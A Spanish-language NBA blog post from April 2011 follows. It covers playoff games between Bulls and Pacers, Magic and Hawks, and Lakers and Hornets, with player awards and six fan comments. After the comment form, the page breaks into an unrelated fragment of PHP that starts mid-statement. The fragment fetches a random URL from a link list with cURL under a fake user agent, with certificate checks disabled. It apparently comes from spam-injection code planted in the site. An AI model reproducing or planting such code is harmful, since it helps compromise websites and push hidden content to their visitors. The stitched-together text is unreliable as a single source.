Playoffs (26/04/2011): Chicago a semifinales de conferencia

27 de April de 2011 por TheDeerHunter

Ya tenemos otro equipo en segunda ronda. Los Bulls impusieron la lógica y cerraron la eliminatoria en el United, en el quinto encuentro. Los Pacers, más entregados que otra cosa, fueron una madre defensivamente. Con Collison tocado, a Voguel se le ocurrió poner al rookie Paul George sobre Rose y fue casi como no poner a nadie y eso que el base de los Bulls tampoco andaba al 100%. Unos Bulls cómodos y llenos de confianza lanzaron mejor que durante toda la serie y les endosaron 30 puntos en cada uno de los tres primeros cuartos, con Luol Deng como jugador más destacado. Los Pacers, en cambio, no estuvieron finos ni en el tiro ni en la distribución. Lo dicho, entregados. El último cuarto fue directamente a la basura (89-116).

Sin embargo, los Bulls aún no conocen su próximo rival. Orlando no dio su brazo a torcer y forzó con comodidad el 6º. Palizón a los Hawks con Howard anotando una única canasta en juego. Por primera vez en toda la serie Van Gundy encontró la manera de parar a Jamal Crawford y a Joe Johnson y encontró producción en toda su plantilla, recordando esos Magic profundos y versátiles que han dado guerra los últimos años. Richardson fue el mejor de los titulares, pero también cuajaron un muy buen partido Redick y Ryan Anderson (76-101). Ahora les toca dar el do de pecho en el Phillips Arena de Atlanta.

En LA, finalmente Kobe salió de titular y fue el mejor de los suyos a pesar de que donde los Lakers destrozaron a los Hornets fue en la pintura. No es normal endosarles una diferencia de casi 20 rebotes un día y en otro que te ganen ese aspecto. Sin juego interior a su disposición Paul estuvo simplemente correcto con buenas aunque insuficientes ayudas de Ariza y Belinelli. Anoche los campeones no estaban dispuestos a perder (90-106). Les queda otro pérfido partido en New Orleans pero ya saben que volverán, clasificados o no, a Los Ángeles.

Por cierto. Artest ciudadano del año en la NBA. Quién le ha visto…

PREMIOS

MVP: Los Pacers obviaron el factor Luol Deng y se llevaron un severo correctivo. El británico anotó 24 puntos que complementó con 6 rebotes, 7 asistencias y 3 robos.

Sorpresa: A Keith Bogans le entraron 5 de los 7 triples que intentó. Sus 15 puntos fueron parte importante del festival anotador de los Bulls.

Decepción: Día para olvidar de Joe Johnson (2 de 12) y Jamal Crawford (2 de 8). En breve tendrán la oportunidad de resarcirse contundentemente.

Esfuerzo en vano: Si gana es MVP y si pierde tiene muchos números de ser “esfuerzo en vano”. Chris Paul anotó 20 puntos y repartió 12 asistencias pero los Lakers habían activado el modo vencedor.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Tito Mc dice:
    #1

    Habéis visto a Rose calentando con las pesas en los tobillos? Qué bestia! Nunca lo había visto en un calentamiento

      Citar

  2. GreenPride dice:
    #2

    De anoche vi los 3 encuentros.
    En el Bulls-Pacers poco que decir. Chicago jugó a muy buen nivel por primera vez estos playoffs y ganó cómodamente con un muy buen Rose apoyado sobre todo por Bogans y Deng en ataque y por una buena defensa. Los Bulls ahora esperan rival esperando que Boozer vuelva por sus fueros después de una primera ronda muy floja. Le necesitarán si quieren llegar lejos.
    En Orlando cambiaron las tornas respecto a los partidos jugados en Atlanta. Por fin los tiradores de los Magic tuvieron su noche y empezaron a meterlas y cuando eso pasa los de Orlando son un equipo muy peligroso ya que no se basan en dársela a un jugador todavía limitado en ataque como Howard. Todo empezó con una racha de Reddick y se le fueron sumando Richardson y Anderson. Hasta Turkoglu metió algunas buenas canastas. La clave también estuvo en parar a Crawford y JJ que tuvieron una noche para olvidar. Interesantísimo 6º partido el de esta serie, veremos si de una vez los Hawks tienen lo necesario para pasar una eliminatoria.
    En Los Angeles Kobe jugó y muy bien por cierto a ratos con dos mates espectaculares pero la clave fue la grandísima diferencia bajo los aros favorable a los angelinos. Si cada vez que fallas te llevas rebote ofensivo difícilmente podrás perder. Esta vez Chris Paul hizo un partido simplemente bueno y la ayuda de Ariza y Belinelli no valió ante la gran desventaja bajo los aros. Los Hornets bastante hacen con lo que tienen pero deberán protejer mucho la pintura si pretenden inquietar algo más a los Lakers que yo creo que cerrarán la serie en el 6º

      Citar

  3. Busky23 dice:
    #3

    Mas les vale a los Hawks matar la eliminatoria en el sexto,sino me da que se quedarán a las puertas…otra vez.

    Espero que hoy los Heat liquiden a los Sixers y empiece ya lo que para mi es “LA ELIMINATORIA “,en mayúsculas, contra los verdes…saltaran chispas

      Citar

  4. JHC dice:
    #4

    Pues si ma les vale a mis Hawks cerrar la eliminatoria el proximo partido o de otra forma estaremos casi seguro eliminados xk los magics no se van a volver dejar ganar en su feudo animo Hawks y ha cerrar la serie en Atlanta

      Citar

  5. Antoine Doinel dice:
    #5

    Veo a mucha gente dando por claros favoritos a los Heat. Me gusta.

      Citar

  6. Rompe dice:
    #6

    Impresionante, en la victoria de Miami LeBron se quedó en 13 tiros… menos que Chalmers!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>